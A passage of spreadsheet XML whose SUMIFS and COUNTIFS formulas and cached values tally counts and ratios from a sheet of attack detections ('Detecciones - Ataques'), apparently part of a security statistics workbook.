        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY59)+SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY59 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY59)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY59 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GA59" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY59)+SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY59 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY59)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY59 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GC59" s="379" t="s">
        <v>310</v>
      </c>
      <c r="GD59" s="368">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY59)+SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY59 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY59)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY59 &amp; "*"))</f>
        <v>0.00119760479</v>
      </c>
      <c r="GE59" s="369">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY59)+SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY59 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY59)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY59 &amp; "*"))</f>
        <v>0.2</v>
      </c>
    </row>
    <row r="60">
      <c r="J60" s="277"/>
      <c r="K60" s="352" t="s">
        <v>2535</v>
      </c>
      <c r="L60" s="403" t="s">
        <v>2536</v>
      </c>
      <c r="M60" s="403" t="s">
        <v>2537</v>
      </c>
      <c r="N60" s="404" t="s">
        <v>2538</v>
      </c>
      <c r="O60" s="278"/>
      <c r="Q60" s="271"/>
      <c r="R60" s="352" t="s">
        <v>2526</v>
      </c>
      <c r="S60" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>10066</v>
      </c>
      <c r="T60" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>9998</v>
      </c>
      <c r="U60" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>16</v>
      </c>
      <c r="V60" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>8</v>
      </c>
      <c r="W60" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X60" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="Y60" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>792</v>
      </c>
      <c r="Z60" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>7634</v>
      </c>
      <c r="AA60" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>25</v>
      </c>
      <c r="AB60" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>20</v>
      </c>
      <c r="AC60" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>24</v>
      </c>
      <c r="AD60" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>1773</v>
      </c>
      <c r="AE60" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>53</v>
      </c>
      <c r="AF60" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>19</v>
      </c>
      <c r="AG60" s="271"/>
      <c r="AH60" s="352" t="s">
        <v>2526</v>
      </c>
      <c r="AI60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>10064</v>
      </c>
      <c r="AJ60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>1</v>
      </c>
      <c r="AL60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>9998</v>
      </c>
      <c r="AN60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>3</v>
      </c>
      <c r="AR60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>4</v>
      </c>
      <c r="AS60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>3</v>
      </c>
      <c r="AU60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>4</v>
      </c>
      <c r="AV60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>2</v>
      </c>
      <c r="AW60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>8</v>
      </c>
      <c r="AY60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>0</v>
      </c>
      <c r="BA60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>0</v>
      </c>
      <c r="BB60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>1</v>
      </c>
      <c r="BD60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>0</v>
      </c>
      <c r="BF60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>792</v>
      </c>
      <c r="BI60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>0</v>
      </c>
      <c r="BL60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>0</v>
      </c>
      <c r="BM60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>658</v>
      </c>
      <c r="BN60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>6976</v>
      </c>
      <c r="BO60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>0</v>
      </c>
      <c r="BR60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>0</v>
      </c>
      <c r="BT60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>0</v>
      </c>
      <c r="BU60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>0</v>
      </c>
      <c r="BX60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>1</v>
      </c>
      <c r="BZ60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>20</v>
      </c>
      <c r="CA60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>0</v>
      </c>
      <c r="CC60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>0</v>
      </c>
      <c r="CE60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>0</v>
      </c>
      <c r="CG60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>1</v>
      </c>
      <c r="CI60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>0</v>
      </c>
      <c r="CJ60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>8</v>
      </c>
      <c r="CL60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>3</v>
      </c>
      <c r="CN60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>1</v>
      </c>
      <c r="CP60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>23</v>
      </c>
      <c r="CQ60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>0</v>
      </c>
      <c r="CR60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>1771</v>
      </c>
      <c r="CT60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>2</v>
      </c>
      <c r="CU60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>0</v>
      </c>
      <c r="CY60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>48</v>
      </c>
      <c r="CZ60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC60" s="355">
